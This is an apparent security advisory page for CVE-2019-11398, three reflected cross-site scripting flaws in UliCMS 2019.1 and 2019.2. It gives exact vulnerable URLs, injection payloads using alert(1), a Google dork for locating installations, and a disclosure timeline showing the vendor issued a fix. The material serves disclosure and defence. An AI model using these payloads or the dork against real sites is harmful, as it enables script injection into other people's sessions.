UliCMS 2019.2 / 2019.1 Multiple Cross-Site Scripting

2019.04.23
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

# Exploit Title: UliCMS - 2019.2 , 2019.1 - Multiple Cross-Site Scripting # Google Dork: intext:"by UliCMS" # Exploit Author: Kağan EĞLENCE # Vendor Homepage: https://en.ulicms.de/ # Version: 2019.2 , 2019.1 # CVE : CVE-2019-11398 ### Vulnerability 1 Url : http://localhost/ulicms/ulicms/admin/index.php?go=test%27%20accesskey=%27X%27%20onclick=%27alert(1) Vulnerable File : /ulicms/admin/inc/loginform.php Request Type: GET Vulnerable Parameter : "go" Payload: test%27%20accesskey=%27X%27%20onclick=%27alert(1) Result : <input type="hidden" name="go" value='asd' accesskey='X' onclick='alert(1)'> ### Vulnerability 2 Url : http://localhost/ulicms/ulicms/admin/index.php?register=register&go=test%27%20accesskey=%27X%27%20onclick=%27alert(1) Vulnerable File : /ulicms/admin/inc/registerform.php Request Type: GET Vulnerable Parameter : "go" Payload : register=register&go=asd%27%20accesskey=%27X%27%20onclick=%27alert(1) Result : <input type="hidden" name="go" value='asd' accesskey='X' onclick='alert(1)'> ### Vulnerability 3 - Authenticated Url : http://localhost/ulicms/ulicms/admin/index.php?action=favicon&error=%3Cscript%3Ealert(1)%3C/script%3E Request Type: GET Vulnerable Parameter : "error" Payload : action=favicon&error=%3Cscript%3Ealert(1)%3C/script%3E ### History ============= 2019-04-13 Issue discovered 2019-04-13 Vendor contacted 2019-04-13 Vendor response and hotfix 2019-04-14 Vendor releases fixed versions 2019-04-22 Advisory release


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top